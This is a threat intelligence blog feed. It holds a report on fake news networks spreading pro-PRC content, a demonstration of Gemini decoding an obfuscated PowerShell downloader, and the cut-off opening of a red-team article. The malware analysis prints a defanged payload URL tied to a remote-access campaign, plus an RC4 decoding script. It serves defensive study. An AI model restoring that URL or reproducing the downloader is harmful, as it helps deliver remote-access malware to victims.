<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/</link><description>Threat Intelligence</description><atom:link href="https://cloudblog.withgoogle.com/blog/topics/threat-intelligence/rss/" rel="self"></atom:link><language>en</language><lastBuildDate>Fri, 22 Nov 2024 10:57:56 +0000</lastBuildDate><image><url>https://cloud.google.com/blog/topics/threat-intelligence/static/blog/images/google.a51985becaa6.png</url><title>Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/</link></image><item><title>Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations</title><link>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</link><description><div class="block-paragraph_advanced"><p>Written by: Vanessa Molter</p> <p><span style="font-style: italic; vertical-align: baseline;">Special thanks to Mandiant's Ryan Serabian for his contributions to this analysis.</span></p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This blog post details GLASSBRIDGE—an umbrella group of four different companies that operate networks of inauthentic news sites and newswire services tracked by the Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant). Collectively these firms bulk-create and operate hundreds of domains that pose as independent news websites from dozens of countries, but are in fact publishing thematically similar, inauthentic content that emphasizes narratives aligned to the political interests of the People’s Republic of China (PRC). 
Since 2022, Google has blocked more than a thousand GLASSBRIDGE-operated websites from eligibility to appear in Google News features and Google Discover because these sites violated our </span><a href="https://support.google.com/news/publisher-center/answer/6204050?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">policies</span></a><span style="vertical-align: baseline;"> that prohibit deceptive behavior and require editorial transparency. </span></p> <p><span style="vertical-align: baseline;">We cannot attribute who hired these services to create the sites and publish content, but assess the firms may be taking directions from a shared customer who has outsourced the distribution of pro-PRC content via imitation news websites.</span></p> <p><span style="vertical-align: baseline;">These campaigns are </span><a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">another example</span></a><span style="vertical-align: baseline;"> of private public relations (PR) firms conducting coordinated influence campaigns—in this case, spreading content aligned with the PRC’s views and political agenda to audiences dispersed across the globe. By using private PR firms, the actors behind the information operations (IO) gain plausible deniability, obscuring their role in the dissemination of coordinated inauthentic content.</span></p> <h2><span style="vertical-align: baseline;">The Basics</span></h2> <p><span style="vertical-align: baseline;">These inauthentic news sites are operated by a small number of stand-alone digital PR firms that offer newswire, syndication and marketing services. They pose as independent outlets that republish articles from PRC state media, press releases, and other content likely commissioned by other PR agency clients. 
In some cases, they publish localized news content copied from legitimate news outlets. We have also observed content from </span><a href="https://blog.google/threat-analysis-group/google-disrupted-dragonbridge-activity-q1-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DRAGONBRIDGE</span></a><span style="vertical-align: baseline;">, the most prolific IO actor TAG tracks, disseminated in these campaigns. </span></p> <p><span style="vertical-align: baseline;">Although the four PR firms discussed in this post are separate from one another, they operate in a similar fashion, bulk-creating dozens of domains at a time and sharing thematically similar inauthentic content. Based on the set of inauthentic news domain names, the firms target audiences outside the PRC, including Australia, Austria, Czechia, Egypt, France, Germany, Hungary, Kenya, India, Indonesia, Japan, Luxemburg, Macao, Malaysia, New Zealand, Nigeria, Poland, Portugal, Qatar, Russia, Saudi Arabia, Singapore, South Korea, Spain, Switzerland, Taiwan, Thailand, Turkey, the United States, Vietnam, and the Chinese-speaking diaspora.</span></p> <p><span style="vertical-align: baseline;">The use of newswire services is a shared tactic across all campaigns, and two of the PR firms directly control and operate the newswire services.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/glassbridge-fig1a.gif" alt="GLASSBRIDGE is an ecosystem of companies and newswire services that publish inauthentic news content"> </a> <figcaption class="article-image__caption "><p data-block-key="lc3u0">Figure 1: GLASSBRIDGE is an ecosystem of companies and newswire services that publish inauthentic news content</p></figcaption> </figure> 
</div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">The Most Prolific: Shanghai Haixun Technology</span></h2> <p><span style="vertical-align: baseline;">Of the PR and marketing firms we have observed supporting pro-China IO campaigns, the most prolific is Shanghai Haixun Technology Co., Ltd or “Haixun”. Since TAG first began </span><a href="https://blog.google/threat-analysis-group/tag-bulletin-q3-2022/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">tracking</span></a><span style="vertical-align: baseline;"> Haixun, Google has removed more than 600 policy-violating domains linked to the firm from the ability to appear in Google News features. The sites target English- and Chinese-speaking audiences, as well as audiences in a number of countries such as Brazil, India, Japan, Kenya, Korea, Malaysia, Saudi Arabia, Singapore, Spain, Russia, Thailand, Qatar, and Vietnam. Google has also terminated a limited number of policy-violating YouTube channels tied to the group. </span></p> <p><span style="vertical-align: baseline;">In July 2023, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/pro-prc-haienergy-us-news/"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant identified Haixun using both Times Newswire and World Newswire</span></a><span style="vertical-align: baseline;"> to place pro-Beijing content on the subdomains of legitimate news outlets. Mandiant also identified Haixun’s use of freelance services such as Fiverr to recruit </span><span style="vertical-align: baseline;">for-hire social media accounts to promote pro-Beijing content.</span></p> <p><span style="vertical-align: baseline;">Haixun’s inauthentic news sites are generally low quality, and much of the content on the domains is spammy and repetitive. 
Mixed in with “filler” articles on topics such as the metaverse, the sites publish news content that is politically aligned to the views of the PRC government. This includes articles from the Global Times, a PRC state-controlled media outlet, and narratives aligned to common PRC talking points on Beijing’s territorial claims in the South China Sea, Taiwan, ASEAN, Falun Gong, Xinjiang, and the COVID-19 pandemic.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig2.max-1000x1000.png" alt="Haixun inauthentic news featuring a mix of content, including PRC government talking points, Global Times articles, and content on the metaverse"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 2: Haixun inauthentic news featuring a mix of content, including PRC government talking points, Global Times articles, and content on the metaverse</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Times Newswire and Shenzhen Haimai Yunxiang Media </span></h2> <p><span style="vertical-align: baseline;">In February 2024, we removed policy-violating domains from appearing on Google News surfaces associated with a pro-PRC coordinated influence campaign reported by Citizen Lab as </span><a href="https://citizenlab.ca/2024/02/paperwall-chinese-websites-posing-as-local-news-outlets-with-pro-beijing-content/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PAPERWALL</span></a><span style="vertical-align: baseline;"> that operated a network of over 100 websites in more than 30 countries masquerading as local news outlets. 
The imitation news sites published localized news content copied from legitimate local news outlets alongside articles republished from PRC state-controlled media, as well as press releases, conspiracy theories, and ad hominem attacks targeting specific individuals. </span></p> <p><span style="vertical-align: baseline;">Based on technical indicators, TAG determined the inauthentic news websites were operated and controlled directly by Times Newswire, one of the news wire services that has distributed content on behalf of Haixun. TAG believes Times Newswire is, in turn, operated by another Chinese media company, Shenzhen Haimai Yunxiang Media Co., Ltd., or “Haimai”, which bills itself as a service provider specialized in global media communication and overseas network promotion. </span></p> <p><span style="vertical-align: baseline;">The views expressed in the conspiracy and smear content were similar to past pro-PRC IO campaigns—for example, character attacks against the Chinese virologist Yan Limeng and claims that the US is conducting biological experiments on humans. Much of the smear content targeting specific individuals was ephemeral—it was posted on imitation news sites for a short period of time and then removed. </span></p> <h2><span style="vertical-align: baseline;">DURINBRIDGE</span></h2> <p><span style="vertical-align: baseline;">Another example of a commercial firm distributing content linked to pro-China IO campaigns is DURINBRIDGE, an alias we use to track a technology and marketing company that has multiple subsidiaries that provide news and PR services. DURINBRIDGE operates a network of over 200 websites designed to look like independent media outlets that publish news content on various topics. 
These domains violated our policies and have been blocked from appearing on Google News surfaces and Discover.</span></p> <p><span style="vertical-align: baseline;">Importantly, DURINBRIDGE itself is not an IO actor and likely published the IO content on behalf of a customer or partner. Most of the content on the sites is news and press releases from various sources and has no apparent links to coordinated influence campaigns. However, a small portion of the content includes pro-PRC narratives and content directly linked to IO campaigns from Haixun and DRAGONBRIDGE. DURINBRIDGE sites also used articles and images from Times Newswire, which is operated by the aforementioned Chinese PR firm Haimai. </span></p> <p><span style="vertical-align: baseline;">We identified multiple DRAGONBRIDGE articles published to DURINBRIDGE’s news sites. The content included narratives focused on exiled businessman Guo Wengui, a perennial topic for DRAGONBRIDGE, and multiple narratives amplified by DRAGONBRIDGE in the lead up to the Taiwanese presidential election. 
</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig3.max-1000x1000.png" alt="DRAGONBRIDGE content published to inauthentic news sites operated by DURINBRIDGE"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 3: DRAGONBRIDGE content published to inauthentic news sites operated by DURINBRIDGE</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig4.max-1000x1000.png" alt="“Secret History of Tsai Ing-Wen,” on DURINBRIDGE-operated inauthentic news site"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 4: “Secret History of Tsai Ing-Wen,” on DURINBRIDGE-operated inauthentic news site</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig5.max-1000x1000.png" alt="Narratives about then-candidate Lai Ching-te promoted by DRAGONBRIDGE prior to the Taiwanese presidential election"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 5: Narratives about then-candidate Lai Ching-te promoted by DRAGONBRIDGE prior to the Taiwanese presidential election</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Shenzhen Bowen 
Media</span></h2> <p><span style="vertical-align: baseline;">In early 2024, TAG and Mandiant identified a fourth marketing firm that operates a network of over 100 domains that pose as independent news sites focused on countries and cities across Europe, the Americas, Asia, and Australia. These domains violated our policies and have been blocked from appearing on Google News surfaces and Discover. The operator of the sites, Shenzhen Bowen Media Information Technology Co., Ltd., is a PRC-based marketing firm that also operates World Newswire, the same press release service used by Haixun to place content on the subdomains of legitimate news outlets. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig6.max-1000x1000.png" alt="Sites linked to Shenzhen Bowen with localized content for Brazil and Germany"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 6: Sites linked to Shenzhen Bowen with localized content for Brazil and Germany</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Shenzhen Bowen’s sites present themselves as local outlets focused on a particular country or city, with articles in the local language about business, sports, and politics. The content is in multiple languages, aligned to each target audience, including Chinese, English, French, German, Japanese, and Thai. The sites do not disclose their connection to the marketing firm. </span></p> <p><span style="vertical-align: baseline;">Side-by-side with local content, the sites include narratives promoting the Chinese government’s interests, much of it sourced from World Newswire. 
In more than one case, TAG and Mandiant have identified content linked to DRAGONBRIDGE published on Shenzhen Bowen-operated sites. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/glassbridge-fig7.max-1000x1000.png" alt="DRAGONBRIDGE content on “Boston Journal” website linked to Shenzhen Bowen Media"> </a> <figcaption class="article-image__caption "><p data-block-key="ol9gk">Figure 7: DRAGONBRIDGE content on “Boston Journal” website linked to Shenzhen Bowen Media</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">The inauthentic news sites operated by GLASSBRIDGE illustrate how information operations actors have embraced methods beyond social media in an attempt to spread their narratives. We have observed similar behavior from </span><a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Russian</span></a><span style="vertical-align: baseline;"> and </span><a href="https://blog.google/threat-analysis-group/tag-bulletin-q3-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Iranian</span></a><span style="vertical-align: baseline;"> IO actors. By posing as independent, and often local news outlets, IO actors are able to tailor their content to specific regional audiences and present their narratives as seemingly legitimate news and editorial content. 
In fact, the content has been crafted or amplified by PR and newswire firms who conceal their role, or actively misrepresent their content as local and independent news coverage. In the case of GLASSBRIDGE, the consistency in content, behavioral similarities, connections across firms, and pro-PRC messaging suggests the private firms take direction from a shared customer who outsourced the creation of influence campaigns. Google is committed to information transparency, and we will continue tracking GLASSBRIDGE and blocking their inauthentic content on Google’s platforms. We regularly disclose our latest enforcement actions in the </span><a href="https://blog.google/threat-analysis-group/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TAG Bulletin</span></a><span style="vertical-align: baseline;">. </span></p></div></description><pubDate>Fri, 22 Nov 2024 10:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence</title><link>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">One 
of Google Cloud's major missions is to arm security professionals with modern tools to help them defend against the latest threats. Part of that mission involves moving closer to a more autonomous, adaptive approach in threat intelligence automation.</span></span></p> <p><span style="vertical-align: baseline;">In our latest advancements in malware analysis, we’re equipping Gemini with new capabilities to address obfuscation techniques and obtain real-time insights on indicators of compromise (IOCs). By integrating the </span><a href="https://cloud.google.com/vertex-ai/generative-ai/docs/extensions/code-interpreter"><span style="text-decoration: underline; vertical-align: baseline;">Code Interpreter extension</span></a><span style="vertical-align: baseline;">, Gemini can now dynamically create and execute code to help deobfuscate specific strings or code sections, while </span><a href="https://cloud.google.com/security/products/threat-intelligence"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence</span></a><span style="vertical-align: baseline;"> (GTI) </span><a href="https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/function-calling"><span style="text-decoration: underline; vertical-align: baseline;">function calling</span></a><span style="vertical-align: baseline;"> enables it to query GTI for additional context on URLs, IPs, and domains found within malware samples. 
These tools are a step toward transforming Gemini into a more adaptive agent for malware analysis, enhancing its ability to interpret obfuscated elements and gather contextual information based on the unique characteristics of each sample.</span></p> <p><span style="vertical-align: baseline;">Building on this foundation, we previously explored critical preparatory steps with Gemini 1.5 Pro, leveraging its expansive 2-million-token input window to process substantial sections of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/gemini-for-malware-analysis"><span style="text-decoration: underline; vertical-align: baseline;">decompiled code in a single pass</span></a><span style="vertical-align: baseline;">. To further enhance scalability, we introduced Gemini 1.5 Flash, incorporating </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/scaling-up-malware-analysis-with-gemini"><span style="text-decoration: underline; vertical-align: baseline;">automated binary unpacking</span></a><span style="vertical-align: baseline;"> through Mandiant Backscatter before the decompilation phase to tackle certain obfuscation techniques. Yet, as any seasoned malware analyst knows, the true challenge often begins once the code is exposed. Malware developers frequently employ obfuscation tactics to conceal critical IOCs and underlying logic. Malware may also download additional malicious code, making it challenging to fully understand the behavior of a given sample.</span></p> <p><span style="vertical-align: baseline;">For large language models (LLMs), obfuscation techniques and additional payloads create unique challenges. When dealing with obfuscated strings such as URLs, IPs, domains, or file names, LLMs often “hallucinate” without explicit decoding methods. 
Additionally, LLMs cannot access, for example, URLs that host additional payloads, often resulting in speculative interpretations about the sample’s behavior.</span></p> <p><span style="vertical-align: baseline;">To help with these challenges, Code Interpreter and GTI function calling tools provide targeted solutions. Code Interpreter enables Gemini to autonomously create and execute custom scripts, as needed, using its own judgment to decode obfuscated elements within a sample, such as strings encoded with XOR-based algorithms. This capability minimizes interpretation errors and enhances Gemini's ability to reveal hidden logic without requiring manual intervention. </span></p> <p><span style="vertical-align: baseline;">Meanwhile, GTI function calling expands Gemini’s reach by retrieving contextualized information from Google Threat Intelligence on suspicious external resources such as URLs, IPs, or domains, providing verified insights without speculative guesses. Together, these tools equip Gemini to better handle obfuscated or externally hosted data, bringing it closer to the goal of functioning as an autonomous agent for malware analysis.</span></p> <p><span style="vertical-align: baseline;">To illustrate how these enhancements boost Gemini's capabilities, let's look at a practical example. In this case, we’re analyzing a PowerShell script that contains an obfuscated URL that hosts a second-stage payload. This particular sample was previously analyzed with some of the most advanced publicly available LLM models, which incorporate code generation and execution as part of their reasoning process. 
Despite these capabilities, each model “hallucinated,” generating completely fabricated URLs instead of accurately revealing the correct one.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gemini-for-malware3-fig1.max-1000x1000.png" alt="Obfuscated PowerShell code sample to be analyzed by Gemini"> </a> <figcaption class="article-image__caption "><p data-block-key="rb3he">Obfuscated PowerShell code sample to be analyzed by Gemini</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Utilizing Code Interpreter and GTI function calling as part of its reasoning process, Gemini autonomously generated the following report without any human intervention. When deemed necessary, it applies these tools to process and extract additional information from the sample.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <h3><span style="vertical-align: baseline;">Final Report: PowerShell Malware with URL Deobfuscation</span></h3> <p><span style="vertical-align: baseline;">This report analyzes a PowerShell script designed to download and execute a file from an obfuscated URL. The script employs a custom obfuscation routine resembling the RC4 stream cipher to conceal the malicious URL.</span></p> <p><strong style="vertical-align: baseline;">Functionality:</strong></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Obfuscation Routine:</strong><span style="vertical-align: baseline;"> The script defines a function </span><code style="vertical-align: baseline;">F</code><span style="vertical-align: baseline;"> that performs byte-level XOR encryption using a key derived from the string "tox2". 
This function is used to deobfuscate the malicious URL.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">URL Decryption:</strong><span style="vertical-align: baseline;"> The obfuscated URL, stored as a byte array, is decrypted using the </span><code style="vertical-align: baseline;">F</code><span style="vertical-align: baseline;"> function with "tox2" as the key.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">File Download:</strong><span style="vertical-align: baseline;"> The script downloads a file from the decrypted URL (</span><code style="vertical-align: baseline;">hxxps://filedn[.]eu/lODWTgN8sswHA6Pn8HXWe1J/tox2/Scan_docs%2398097960[.]msi</code><span style="vertical-align: baseline;">) and saves it to the system's temporary directory under a randomly generated filename.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Execution:</strong><span style="vertical-align: baseline;"> Finally, the script executes the downloaded file.</span></p> </li> </ol> <p><strong style="vertical-align: baseline;">Indicators of Compromise (IOCs):</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">URL:</strong><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">hxxps://filedn[.]eu/lODWTgN8sswHA6Pn8HXWe1J/tox2/Scan_docs%2398097960[.]msi</code></p> </li> </ul> <p><strong style="vertical-align: baseline;">Deobfuscation Code:</strong></p> <pre class="language-plain"><code>def deobfuscate(x, y):
    # RC4: x is the obfuscated byte list, y is the key string
    s = list(range(256))
    j = 0
    k = [ord(c) for c in y]
    # Key-scheduling algorithm (KSA): permute the state with the key
    for i in range(256):
        j = (j + s[i] + k[i % len(k)]) % 256
        s[i], s[j] = s[j], s[i]
    i = 0
    j = 0
    output = []
    # Pseudo-random generation algorithm (PRGA): XOR each byte with the keystream
    for m in range(len(x)):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        output.append(x[m] ^ s[(s[i] + s[j]) % 256])
    return output

# Obfuscated URL bytes taken from the PowerShell sample
a = [0x25, 0x7B, 0x5A, 0xD8, 0x9C, 0xFF, 0xC3, 0xA4, 0x95, 0xB7, 0x9D, 0x6E, 0x5F, 0x4D, 0x49, 0xFB,
     0x78, 0x32, 0xB8, 0x17, 0x72, 0x01, 0x31, 0xFB, 0xC0, 0x58, 0x45, 0xCB, 0x5C, 0x3C, 0xDD, 0x00,
     0x60, 0x87, 0x25, 0xB2, 0x44, 0xA6, 0xC5, 0xEA, 0x71, 0xAA, 0x9D, 0xA1, 0x05, 0x5F, 0xBD, 0x41,
     0x28, 0x70, 0x30, 0x6B, 0x96, 0x24, 0x92, 0xA0, 0x9D, 0x92, 0x23, 0x79, 0x69, 0x2C, 0x1B, 0x1E,
     0xEB, 0x69, 0x8F, 0x04, 0x10, 0x74, 0xBC]
b = "tox2"  # key used by the sample's F function
c = deobfuscate(a, b)
decoded_url = "".join(chr(i) for i in c)
print(decoded_url)</code></pre> <p><strong style="vertical-align: baseline;">Google Threat Intelligence (GTI) Lookup:</strong></p> <p><span style="vertical-align: baseline;">The GTI lookup provides valuable context regarding the identified IOC:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Threat Actor:</strong><span style="vertical-align: baseline;"> UNC5687, known for using MESHAGENT in phishing campaigns impersonating the Security Service of Ukraine.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Campaign:</strong><span style="vertical-align: baseline;"> This specific URL is linked to a campaign spreading MESHAGENT via phishing emails with malicious links. 
The campaign involved a captcha page leading to the download of either a malicious MSI or EXE file.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Malware:</strong><span style="vertical-align: baseline;"> The campaign delivers MESHAGENT, an open-source remote access framework, configured to communicate with C2 domains linked to a service called "AnonVNC."</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Conclusion:</strong></p> <p><span style="vertical-align: baseline;">The analyzed PowerShell script is confirmed to be malicious, associated with a phishing campaign by UNC5687 distributing the MESHAGENT remote access tool.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Gemini identified that the script employs an XOR-based obfuscation algorithm that resembles RC4 to conceal the download URL. Recognizing this pattern, Gemini autonomously generates and executes a Python deobfuscation script within the Code Interpreter sandbox, successfully revealing the external resource.</span></p> <p><span style="vertical-align: baseline;">With the URL in hand, Gemini then utilizes GTI function calling to query Google Threat Intelligence for further context. This analysis links the URL to UNC5687, a threat cluster known for using a remote access tool in phishing campaigns impersonating the Security Service of Ukraine.</span></p> <p><span style="vertical-align: baseline;">As we’ve seen, the integration of these tools has strengthened Gemini’s ability to function as a malware analyst capable of adapting its approach to address obfuscation and gathering vital context on IOCs. 
By incorporating the Code Interpreter and GTI function calling, Gemini is better equipped to navigate complex samples by autonomously interpreting hidden elements and contextualizing external references.</span></p> <p><span style="vertical-align: baseline;">While these are significant advancements, many challenges remain, especially given the vast diversity of malware and scenarios that exist in the threat landscape. We’re committed to making steady progress, and future updates will continue to enhance Gemini's capabilities, moving us closer to a more autonomous, adaptive approach in threat intelligence automation.</span></p></div></description><pubDate>Tue, 19 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bernardo Quintero</name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Andrés Ramírez</name><title></title><department></department><company></company></author></item><item><title>Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation</title><link>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Written by: Matthijs Gielen, Jay Christiansen</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Background</span></h2> <p><span 
style="vertical-align: baseline;">New solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us—the attackers and defenders—and our battle to improve security through all the noise?</span></p> <p><span style="vertical-align: baseline;">Data is everywhere. For most organizations, the access to security data is no longer the primary issue. Rather, it is the vast quantities of it, the noise in it, and the disjointed and spread-out nature of it. Understanding and making sense of it—THAT is the real challenge.</span></p> <p><span style="vertical-align: baseline;">When we conduct adversarial emulation (<a href="https://cloud.google.com/security/consulting/mandiant-red-team">red team</a>) engagements, making sense of all the network, user, and domain data available to us is how we find the path forward. From a defensive perspective, efficiently finding the sharpest and most dangerous needles in the haystack—for example, easily accessible credentials on fileshares—is how we prioritize, improve, and defend.</span></p> <p><span style="vertical-align: baseline;">How do you make sense of this vast amount of structured and unstructured data, and give yourself the advantage?</span></p> <p><span style="vertical-align: baseline;">Data permeates the modern organization. This data can be challenging to parse, process, and understand from a security implication perspective, but AI might just change all that.</span></p> <p><span style="vertical-align: baseline;">This blog post will focus on a number of case studies where we obtained data during our complex adversarial emulation engagements with our global clients, and how we innovated using AI and LLM systems to process this into structured data that could be used to better defend organizations. 
